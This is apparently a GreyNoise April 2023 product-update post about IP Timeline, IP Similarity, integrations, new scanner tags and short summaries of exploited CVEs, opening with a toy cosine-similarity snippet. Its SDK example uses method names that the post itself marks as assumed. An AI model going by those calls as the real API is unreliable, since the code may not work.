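def normalize(v: np.ndarray) -> np.ndarray:
    norm = np.linalg.norm(v)
    return v / norm if norm else v

ip_a = np.array([1.0, 0.0, 3.0, 0.0, 1.0])  # toy features (think: ports, web path tokens, rDNS tokens)
ip_b = np.array([1.0, 0.0, 2.5, 0.0, 0.0])

similarity = float(normalize(ip_a) @ normalize(ip_b))
print(f"cosine similarity: {similarity:.3f}")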

IP Timeline Enhancements 

GreyNoise IP Timeline Enhancements

90 Days of IP Timeline Data Now Available

We’ve enhanced our IP timeline feature to store up to 90 days of IP history data (previously, we provided up to 60 days of data) to enable customers to better understand historical IP activity when threat hunting or performing incident response.  IP Timeline is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

New and Updated Integrations

Integration Update: Anomali ThreatStream Enrichment

GreyNoise Similarity Intel

We updated our Anomali ThreatStream Enrichment to include our IP Similarity and IP Timeline features. From the context of an observable, customers can now see all details GreyNoise knows, plus view similar IPs and the timeline of observed activity. Learn More

New Integration: Anomali ThreatStream Malicious IP Feed

Our Malicious IP Feed is now available on the Anomali ThreatStream marketplace. Customers can now easily subscribe to the feed and get a daily update of malicious IPs that GreyNoise observed scanning the internet in the last 24 hours. Learn More

Integration Update: Splunk SOAR

We updated our Splunk SOAR integration to introduce two new commands: "similar noise ips" and "noise ip timeline". These commands pull data from the GreyNoise IP Similarity and IP Timeline features and allow customers to bring that context into Splunk SOAR for an analyst to use during an investigation.  Learn More

Integration Update: Maltego

We updated our Maltego Enterprise transform set to include a new Transform that allows users to query for Similar IPs.  This leverages the new IP Similarity tool and allows Maltego users to bring similar IPs into their graphs for additional research and correlation within Maltego.  Learn More

Integration Update: GreyNoise SDK

The GreyNoise SDK has been updated to include both CLI and API based commands to interact with the new IP Timeline and IP Similarity APIs. Learn More
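
As a rough sketch of what that looks like from Python (the similar() and timeline() method names here are our assumption; see the SDK README for the exact commands and their CLI equivalents):

from greynoise import GreyNoise  # pip install greynoise

# Sketch based on the update described above. The similar()/timeline() method names are
# assumptions -- check the SDK README for the exact call signatures.
session = GreyNoise(api_key="YOUR_API_KEY")

similar_ips = session.similar("203.0.113.7")   # IP Similarity lookup (assumed method name)
activity = session.timeline("203.0.113.7")     # IP Timeline lookup (assumed method name)

print(similar_ips)
print(activity)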

Tags Coverage Enhancements

In the month of April, GreyNoise added 20 new tags:

10 malicious activity tags

6 benign actor tags

4 unknown activity tags

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert that will inform them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

In collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

Check Point Research discovered three vulnerabilities in the Microsoft Message Queuing (MSMQ) service, which were patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. GreyNoise has a tag, classified as malicious, for the full QueueJumper RCE Attempt.

Sensor Coverage Enhancements

GreyNoise Sensor Coverage Enhancements

We’ve added additional sensor coverage for the following countries:

Destination country search is available in all commercial plans for GreyNoise and to our community VIP users. Start a trial* today to explore destination data.

Search Enhancements

GreyNoise Search Enhancements

The GNQL cheat sheet is now available in the search bar.  Want to learn more about how to effectively use GNQL? Review the cheat sheet for some helpful examples around syntax and available fields to use in search.

(*To begin your GreyNoise Enterprise Trial, sign in to your account or sign up for a free account, then go to your account details page and select "Start Trial".)
